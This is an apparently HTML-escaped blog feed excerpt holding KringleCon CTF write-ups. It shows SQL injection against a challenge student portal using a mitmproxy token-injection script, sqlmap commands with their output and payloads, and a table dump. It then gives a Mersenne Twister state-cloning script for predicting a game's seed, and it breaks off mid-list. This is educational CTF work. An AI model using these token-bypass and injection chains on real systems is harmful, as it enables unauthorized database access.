&lt;p>The given target (&lt;strong>studentportal.elfu.org&lt;/strong>) has several endpoints, which could be targeted with a Web App exploit:&lt;/p>
&lt;ul>
&lt;li>&lt;code>studentportal.elfu.org/index.php&lt;/code>&lt;/li>
&lt;li>&lt;code>studentportal.elfu.org/students.php&lt;/code>&lt;/li>
&lt;li>&lt;code>studentportal.elfu.org/apply.php&lt;/code>&lt;/li>
&lt;li>&lt;code>studentportal.elfu.org/check.php&lt;/code>&lt;/li>
&lt;/ul>
&lt;p>The first and the second do not accept any input, so they are not going to be very useful for this objective, however the &lt;strong>apply.php&lt;/strong> and &lt;strong>check.php&lt;/strong> do accept user input through HTML forms. Of these two, I first decided to take a look at the latter, as it only has one input field, which can be enough for the purpose. Do note that the HTML form in the &lt;strong>check.php&lt;/strong> endpoint has a different target specified: &lt;strong>application-check.php&lt;/strong>, so the &lt;strong>sqlmap&lt;/strong> attack should be directed to this URL instead of &lt;strong>check.php&lt;/strong>.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-html" data-lang="html">&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">form&lt;/span> &lt;span class="na">id&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;check&amp;#34;&lt;/span> &lt;span class="na">action&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;/application-check.php&amp;#34;&lt;/span> &lt;span class="na">method&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;get&amp;#34;&lt;/span> &lt;span class="na">onsubmit&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;submitApplication()&amp;#34;&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">h1&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>Check Application Status&lt;span class="p">&amp;lt;/&lt;/span>&lt;span class="nt">h1&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">div&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">label&lt;/span> &lt;span class="na">for&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;inputEmail&amp;#34;&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>Elf Mail Address&lt;span class="p">&amp;lt;/&lt;/span>&lt;span class="nt">label&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">input&lt;/span> &lt;span class="na">name&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;elfmail&amp;#34;&lt;/span> &lt;span class="na">type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;email&amp;#34;&lt;/span> &lt;span class="na">id&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;inputEmail&amp;#34;&lt;/span> &lt;span class="na">placeholder&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;Email address&amp;#34;&lt;/span> &lt;span class="na">required&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;&amp;#34;&lt;/span> &lt;span class="na">autofocus&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;&amp;#34;&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;/&lt;/span>&lt;span class="nt">div&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">input&lt;/span> &lt;span class="na">type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;hidden&amp;#34;&lt;/span> &lt;span class="na">id&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;token&amp;#34;&lt;/span> &lt;span class="na">name&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;token&amp;#34;&lt;/span> &lt;span class="na">value&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;&amp;#34;&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">div&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">input&lt;/span> &lt;span class="na">type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;submit&amp;#34;&lt;/span> &lt;span class="na">value&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;Check Status&amp;#34;&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;/&lt;/span>&lt;span class="nt">div&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;/&lt;/span>&lt;span class="nt">form&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In the HTML source code, notice that the submission form also has a hidden field called &lt;strong>token&lt;/strong>, that also gets sent along the request when the button is clicked. Searching a bit further in the page source you can see a short javascript code which handles the update of this input field and the actual form submission:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-javascript" data-lang="javascript">&lt;span class="kd">function&lt;/span> &lt;span class="nx">submitApplication&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">console&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">log&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;Submitting&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="nx">elfSign&lt;/span>&lt;span class="p">();&lt;/span>
&lt;span class="nb">document&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">getElementById&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;check&amp;#34;&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">submit&lt;/span>&lt;span class="p">();&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="kd">function&lt;/span> &lt;span class="nx">elfSign&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">s&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">document&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">getElementById&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;token&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="kr">const&lt;/span> &lt;span class="nx">Http&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="k">new&lt;/span> &lt;span class="nx">XMLHttpRequest&lt;/span>&lt;span class="p">();&lt;/span>
&lt;span class="kr">const&lt;/span> &lt;span class="nx">url&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;/validator.php&amp;#39;&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="nx">Http&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">open&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;GET&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">url&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="kc">false&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="nx">http&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">send&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kc">null&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">Http&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">status&lt;/span> &lt;span class="o">===&lt;/span> &lt;span class="mi">200&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">console&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">log&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">Http&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">responseText&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="nx">s&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">value&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">Http&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">responseText&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So now you know that when you call sqlmap and attack &lt;strong>elfmail&lt;/strong>, you also need to set up some kind script that automatically fetches the token and inserts it into the requests, as it will be rejected otherwise. My first idea was to write a &lt;strong>tamper&lt;/strong> script for sqlmap, which defines the custom transformation that inserts the token into the payload of each request. However, for some reason I could not get this tamper script to work, I always received &lt;strong>Invalid or expired token&lt;/strong> error for every request generated by sqlmap.&lt;/p>
&lt;p>So next, I looked around on the net for an alternative solution, and found the &lt;strong>mitmproxy&lt;/strong>
&lt;a href="https://mitmproxy.org" target="_blank" rel="noopener">tool&lt;/a> which has a nice python API that helped with the token injection. The github repo for the &lt;strong>mitmproxy&lt;/strong> project has several useful
&lt;a href="https://github.com/mitmproxy/mitmproxy/blob/master/examples/simple/modify_querystring.py" target="_blank" rel="noopener">examples&lt;/a>, which helped me learn enough of the API to get going with the token injecting service. The script I used was very simple and easy to understand:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="kn">from&lt;/span> &lt;span class="nn">mitmproxy&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="n">http&lt;/span>
&lt;span class="kn">import&lt;/span> &lt;span class="nn">requests&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">request&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">flow&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">http&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">HTTPFlow&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">-&amp;gt;&lt;/span> &lt;span class="bp">None&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="c1"># obtain the token from the validator.php endpoint&lt;/span>
&lt;span class="n">r&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">requests&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;https://studentportal.elfu.org/validator.php&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1"># insert the token into the request that is intercepted by mitmproxy&lt;/span>
&lt;span class="n">flow&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">request&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">query&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;token&amp;#34;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">r&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">content&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;utf-8&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Below is a sample screenshot of the &lt;strong>mitmproxy&lt;/strong> console when looking at a sample request that was already injected with the necessary token:&lt;/p>
&lt;p>&lt;img src="../images/obj9-mitmreq.png" alt="Student portal">&lt;/p>
&lt;p>Now that the proxy is set up (IP: &lt;strong>192.168.56.7&lt;/strong>, PORT: &lt;strong>8080&lt;/strong>), it was time to let sqlmap loose on the database and find some vulnerabilities. To start the scan you need to run the following command specifying the URL and the query parameter you want to exploit (which was &lt;strong>-p elfmail&lt;/strong> in this case):&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">~/sqlmap ▶ python sqlmap.py --proxy&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;http://192.168.56.7:8080&amp;#39;&lt;/span> --url&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;https://studentportal.elfu.org/application-check.php?elfmail=email@example.com&amp;#34;&lt;/span> -p elfmail -risk &lt;span class="m">3&lt;/span>
___
__H__
___ ___&lt;span class="o">[&lt;/span>.&lt;span class="o">]&lt;/span>_____ ___ ___ &lt;span class="o">{&lt;/span>1.3.12.34#dev&lt;span class="o">}&lt;/span>
&lt;span class="p">|&lt;/span>_ -&lt;span class="p">|&lt;/span> . &lt;span class="o">[(]&lt;/span> &lt;span class="p">|&lt;/span> .&lt;span class="s1">&amp;#39;| . |
&lt;/span>&lt;span class="s1">|___|_ [)]_|_|_|__,| _|
&lt;/span>&lt;span class="s1"> |_|V... |_| http://sqlmap.org
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">[*] starting @ 10:40:06 /2020-01-01/
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">[10:40:06] [INFO] testing connection to the target URL
&lt;/span>&lt;span class="s1">[10:40:09] [INFO] target URL content is stable
&lt;/span>&lt;span class="s1">[10:40:10] [INFO] heuristic (basic) test shows that GET parameter &amp;#39;&lt;/span>elfmail&lt;span class="s1">&amp;#39; might be injectable (possible DBMS: &amp;#39;&lt;/span>MySQL&lt;span class="s1">&amp;#39;)
&lt;/span>&lt;span class="s1">[10:40:11] [INFO] heuristic (XSS) test shows that GET parameter &amp;#39;&lt;/span>elfmail&lt;span class="s1">&amp;#39; might be vulnerable to cross-site scripting (XSS) attacks
&lt;/span>&lt;span class="s1">[10:40:11] [INFO] testing for SQL injection on GET parameter &amp;#39;&lt;/span>elfmail&lt;span class="s1">&amp;#39;
&lt;/span>&lt;span class="s1">it looks like the back-end DBMS is &amp;#39;&lt;/span>MySQL&lt;span class="s1">&amp;#39;. Do you want to skip test payloads specific for other DBMSes? [Y/n]
&lt;/span>&lt;span class="s1">for the remaining tests, do you want to include all tests for &amp;#39;&lt;/span>MySQL&lt;span class="s1">&amp;#39; extending provided level (1) value? [Y/n]
&lt;/span>&lt;span class="s1">[10:40:25] [INFO] testing &amp;#39;&lt;/span>AND boolean-based blind - WHERE or HAVING clause&lt;span class="s1">&amp;#39;
&lt;/span>&lt;span class="s1">[10:40:31] [INFO] GET parameter &amp;#39;&lt;/span>elfmail&lt;span class="s1">&amp;#39; appears to be &amp;#39;&lt;/span>AND boolean-based blind - WHERE or HAVING clause&lt;span class="s1">&amp;#39; injectable (with --string=&amp;#34;Your application is still pending!&amp;#34;)
&lt;/span>&lt;span class="s1">[...REDACTED FOR BREVITY...]
&lt;/span>&lt;span class="s1">[10:46:19] [INFO] testing &amp;#39;&lt;/span>MySQL UNION query &lt;span class="o">(&lt;/span>random number&lt;span class="o">)&lt;/span> - &lt;span class="m">81&lt;/span> to &lt;span class="m">100&lt;/span> columns&lt;span class="s1">&amp;#39;
&lt;/span>&lt;span class="s1">GET parameter &amp;#39;&lt;/span>elfmail&lt;span class="s1">&amp;#39; is vulnerable. Do you want to keep testing the others (if any)? [y/N]
&lt;/span>&lt;span class="s1">sqlmap identified the following injection point(s) with a total of 279 HTTP(s) requests:
&lt;/span>&lt;span class="s1">---
&lt;/span>&lt;span class="s1">Parameter: elfmail (GET)
&lt;/span>&lt;span class="s1"> Type: boolean-based blind
&lt;/span>&lt;span class="s1"> Title: AND boolean-based blind - WHERE or HAVING clause
&lt;/span>&lt;span class="s1"> Payload: elfmail=asd&amp;#39;&lt;/span> AND &lt;span class="nv">7313&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">7313&lt;/span> AND &lt;span class="s1">&amp;#39;PMOS&amp;#39;&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;PMOS
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1"> Type: error-based
&lt;/span>&lt;span class="s1"> Title: MySQL &amp;gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
&lt;/span>&lt;span class="s1"> Payload: elfmail=asd&amp;#39;&lt;/span> AND &lt;span class="o">(&lt;/span>SELECT &lt;span class="m">1941&lt;/span> FROM&lt;span class="o">(&lt;/span>SELECT COUNT&lt;span class="o">(&lt;/span>*&lt;span class="o">)&lt;/span>,CONCAT&lt;span class="o">(&lt;/span>0x716b626b71,&lt;span class="o">(&lt;/span>SELECT &lt;span class="o">(&lt;/span>ELT&lt;span class="o">(&lt;/span>&lt;span class="nv">1941&lt;/span>&lt;span class="o">=&lt;/span>1941,1&lt;span class="o">)))&lt;/span>,0x7171626a71,FLOOR&lt;span class="o">(&lt;/span>RAND&lt;span class="o">(&lt;/span>0&lt;span class="o">)&lt;/span>*2&lt;span class="o">))&lt;/span>x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x&lt;span class="o">)&lt;/span>a&lt;span class="o">)&lt;/span> AND &lt;span class="s1">&amp;#39;EUey&amp;#39;&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;EUey
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1"> Type: time-based blind
&lt;/span>&lt;span class="s1"> Title: MySQL &amp;gt;= 5.0.12 AND time-based blind (query SLEEP)
&lt;/span>&lt;span class="s1"> Payload: elfmail=asd&amp;#39;&lt;/span> AND &lt;span class="o">(&lt;/span>SELECT &lt;span class="m">1748&lt;/span> FROM &lt;span class="o">(&lt;/span>SELECT&lt;span class="o">(&lt;/span>SLEEP&lt;span class="o">(&lt;/span>5&lt;span class="o">)))&lt;/span>MzkM&lt;span class="o">)&lt;/span> AND &lt;span class="s1">&amp;#39;qFnu&amp;#39;&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="err">&amp;#39;&lt;/span>qFnu
---
&lt;span class="o">[&lt;/span>10:59:36&lt;span class="o">]&lt;/span> &lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> the back-end DBMS is MySQL
web application technology: PHP 7.2.1, Nginx 1.14.2
back-end DBMS: MySQL &amp;gt;&lt;span class="o">=&lt;/span> 5.0
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now you can see that &lt;strong>sqlmap&lt;/strong>, in cooperation with the &lt;strong>mitmproxy&lt;/strong>, successfully identified the DB type and found 3 vulnerabilities in the &lt;strong>elfmail&lt;/strong> input field:&lt;/p>
&lt;ul>
&lt;li>boolean-based blind&lt;/li>
&lt;li>error-based&lt;/li>
&lt;li>time-based blind&lt;/li>
&lt;/ul>
&lt;p>Next you can use sqlmap explore the database further. Passing the flag &lt;strong>&amp;ndash;dbs&lt;/strong> to the same command as before will list all databases, while the flag &lt;strong>&amp;ndash;tables&lt;/strong> will list all the tables within a chosen database. Once you found the correct combination of flags, you can use the flag &lt;strong>&amp;ndash;dump&lt;/strong> to dump the table&amp;rsquo;s content. In this case these flags worked to find the paper scraps:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">~/sqlmap ▶ python3 sqlmap.py --proxy&lt;span class="o">=[&lt;/span>...&lt;span class="o">]&lt;/span> --url&lt;span class="o">=[&lt;/span>...&lt;span class="o">]&lt;/span> -p elfmail -D elfu -T krampus --dump
database: elfu
Table: krampus
&lt;span class="o">[&lt;/span>&lt;span class="m">6&lt;/span> entries&lt;span class="o">]&lt;/span>
+----+-----------------------+
&lt;span class="p">|&lt;/span> id &lt;span class="p">|&lt;/span> path &lt;span class="p">|&lt;/span>
+----+-----------------------+
&lt;span class="p">|&lt;/span> &lt;span class="m">1&lt;/span> &lt;span class="p">|&lt;/span> /krampus/0f5f510e.png &lt;span class="p">|&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="m">2&lt;/span> &lt;span class="p">|&lt;/span> /krampus/1cc7e121.png &lt;span class="p">|&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="m">3&lt;/span> &lt;span class="p">|&lt;/span> /krampus/439f15e6.png &lt;span class="p">|&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="m">4&lt;/span> &lt;span class="p">|&lt;/span> /krampus/667d6896.png &lt;span class="p">|&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="m">5&lt;/span> &lt;span class="p">|&lt;/span> /krampus/adb798ca.png &lt;span class="p">|&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="m">6&lt;/span> &lt;span class="p">|&lt;/span> /krampus/ba417715.png &lt;span class="p">|&lt;/span>
+----+-----------------------+
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Prepending the file names from the exfiltrated table with the site&amp;rsquo;s URL will finally reveal the paper scraps. Once you download and reassemble all of them, you can read the full text of the letter and answer the objective.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">wget https://studentportal.elfu.org/krampus/0f5f510e.png
wget https://studentportal.elfu.org/krampus/1cc7e121.png
wget https://studentportal.elfu.org/krampus/439f15e6.png
wget https://studentportal.elfu.org/krampus/667d6896.png
wget https://studentportal.elfu.org/krampus/adb798ca.png
wget https://studentportal.elfu.org/krampus/ba417715.png
&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;strong>What is the name of Santa&amp;rsquo;s cutting-edge sleigh guidance system?&lt;/strong>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Super Sled-o-matic
&lt;/code>&lt;/pre>&lt;/div></description></item><item><title>Blockchain Investigation Part 1</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective11a/</link><pubDate>Sun, 27 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective11a/</guid><description>&lt;p>&lt;img src="../images/obj11a/objective11a.png" alt="Objective11a">&lt;/p>
&lt;p>At first glance, this seems like a tough one, so I go to talk with &lt;code>Tangle Coalbox&lt;/code> in the &lt;strong>Speaker Unpreparedness Room&lt;/strong> to get some help.&lt;/p>
&lt;p>First though, he needs my help with his SnowBall Game terminat. He says that people were solving it on &lt;strong>IMPOSSIBLE&lt;/strong> level, which should really be impossible:&lt;/p>
&lt;p>&lt;img src="../images/obj11a/tangle-coalbox.png" alt="Tangle Coalbox">&lt;/p>
&lt;blockquote>
&lt;p>Howdy Boss. You look a tad flushed.
Can I get you some water from the vending machine?
I&amp;rsquo;m still looking into the Snowball Game like you asked.
I read the write-up of the test completed earlier this summer with the web socket vulnerabilities.
I was able to complete the Easy level, but the Impossible level is, umm&amp;hellip;
I&amp;rsquo;d call it impossible, but I just saw someone beat it!
Is it possible that the name a player provides influences how the forts are laid out?
Oh, oh, maybe if I feed a Hard name into an Easy game I can manipulate it!
UGH! on Impossible, the best I get are rejected player names in the page comments&amp;hellip; maybe that&amp;rsquo;s useful?
I&amp;rsquo;ll have to re-watch Tom Liston&amp;rsquo;s talk again (
&lt;a href="https://www.youtube.com/watch?v=Jo5Nlbqd-Vg" target="_blank" rel="noopener">LINK&lt;/a>).
Thanks for all the tips and encouragement Santa!&lt;/p>
&lt;/blockquote>
&lt;p>It seems I am tasked with solving
&lt;a href="https://snowball2.kringlecastle.com" target="_blank" rel="noopener">the game&lt;/a> on &lt;strong>IMPOSSIBLE&lt;/strong> difficulty to see how the others have done it. Following Tangle&amp;rsquo;s advice, I watch the KringleCon
&lt;a href="https://www.youtube.com/watch?v=Jo5Nlbqd-Vg" target="_blank" rel="noopener">talk&lt;/a> by Tom Liston on PRNGs that offers essential information. To get started, I click on the machine which pops up the below welcome screen. I make sure to read the instructions very carefully, at least twice:&lt;/p>
&lt;p>&lt;img src="../images/obj11a/snowball-welcome.png" alt="SnowBall Game Welcome">&lt;/p>
&lt;p>Levels &lt;strong>Easy &amp;amp; Medium&lt;/strong> are indeed quite simple to solve without any trickery. It gets interesting once I start playing with the input box for my &lt;strong>Name&lt;/strong>: this value is used as a seed for a random generator that creates the board. The same value always results in the same board setup.&lt;/p>
&lt;p>On &lt;strong>IMPOSSIBLE&lt;/strong> difficulty this value is &lt;strong>redacted&lt;/strong> but I think there is a way I may try to predict it using the script from Tom Liston&amp;rsquo;s talk. To get to the redacted value I need a certain amount of random numbers generated to clone the internal state of the &lt;strong>Mersenne Twister&lt;/strong> that&amp;rsquo;s used as the generator. Quite unexpectedly, there is a dump of discarded random values in the game&amp;rsquo;s page source:&lt;/p>
&lt;p>&lt;img src="../images/obj11a/impossible-source.png" alt="Impossible HTML Commented Source">&lt;/p>
&lt;p>Next I formulate the below plan to solve it on &lt;strong>IMPOSSIBLE&lt;/strong> difficulty:&lt;/p>
&lt;ol>
&lt;li>Start a new game on &lt;strong>IMPOSSIBLE&lt;/strong> difficulty&lt;/li>
&lt;li>Grab discarded random values from the HTML source&lt;/li>
&lt;li>Feed these values to a modified version of
&lt;a href="https://github.com/tliston/mt19937" target="_blank" rel="noopener">Tim&amp;rsquo;s scipt&lt;/a> to predict next value&lt;/li>
&lt;li>Start a new game on &lt;strong>EASY&lt;/strong> mode with the predicted number from step #2&lt;/li>
&lt;li>Verify that both open games have identical setup by comparing your side of the table&lt;/li>
&lt;li>Solve game on Easy mode manually, then replay it on the other game hitting only known cells&lt;/li>
&lt;li>Collect hints from &lt;code>Tangle&lt;/code>&lt;/li>
&lt;/ol>
&lt;p>The code I wrote is based on
&lt;a href="https://github.com/tliston/mt19937" target="_blank" rel="noopener">Tim&amp;rsquo;s python code&lt;/a>, with the &lt;code>main&lt;/code> changed to:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="ln">1&lt;/span>&lt;span class="k">if&lt;/span> &lt;span class="vm">__name__&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="s2">&amp;#34;__main__&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="ln">2&lt;/span> &lt;span class="n">my_random&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">mt19937&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">3&lt;/span> &lt;span class="k">with&lt;/span> &lt;span class="nb">open&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;random.txt&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="k">as&lt;/span> &lt;span class="n">fp&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="ln">4&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>
&lt;span class="ln">5&lt;/span> &lt;span class="k">for&lt;/span> &lt;span class="n">line&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">fp&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">readlines&lt;/span>&lt;span class="p">():&lt;/span>
&lt;span class="hl">&lt;span class="ln">6&lt;/span> &lt;span class="n">my_random&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">MT&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">untemper&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">int&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">line&lt;/span>&lt;span class="p">))&lt;/span>
&lt;/span>&lt;span class="ln">7&lt;/span> &lt;span class="n">i&lt;/span>&lt;span class="o">+=&lt;/span>&lt;span class="mi">1&lt;/span>
&lt;span class="ln">8&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;Next int: {my_random.extract_number()}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>First it creates a new instance of the &lt;strong>Mersenne Twister&lt;/strong>, then loads the discarded random values from a file called &lt;code>random.txt&lt;/code> and uses them to clone the internal state of the generator used to create the game board. Finally, it generates the next random number which is used to start a new game on &lt;strong>EASY&lt;/strong> level so that I can figure out the cells I need to hit on &lt;strong>IMPOSSIBLE&lt;/strong>:&lt;/p>
&lt;p>&lt;img src="../images/obj11a/win-impossible.png" alt="Win Impossible">&lt;/p>
&lt;p>Finally, &lt;code>Tangle&lt;/code> is ready to share his hints:&lt;/p>
&lt;blockquote>
&lt;p>Wow, it really was all about abusing the pseudo-random sequence!
I&amp;rsquo;ve been thinking, do you think someone could try and cheat the Naughty/Nice Blockchain with this same technique?
I remember you told us about how if you have control over to bytes in a file, it&amp;rsquo;s easy to create MD5 hash collisions.
But the nonce would have to be known ahead of time.
We know that the blockchain works by &amp;ldquo;chaining&amp;rdquo; blocks together.
There&amp;rsquo;s no way you know who could change it without messing up the chain, right Santa?
I&amp;rsquo;m going to look closer to spot if any of the blocks have been changed.
If Jack was able to change the block AND the document without changing the hash&amp;hellip; that would require a very UNIque hash COLLision.
Apparently Jack was able to change just 4 bytes in the block to completely change everything about it. It&amp;rsquo;s like some sort of evil game to him.
I think I need to review my Human Behavior Naughty/Niceness curriculum again.&lt;/p>
&lt;/blockquote>
&lt;p>I also get some useful links from him:&lt;/p>
&lt;ul>
&lt;li>GitHub repo about
&lt;a href="https://github.com/corkami/collisions" target="_blank" rel="noopener">MD5 Hash Collisions&lt;/a>&lt;/li>
&lt;li>GitHub repo about
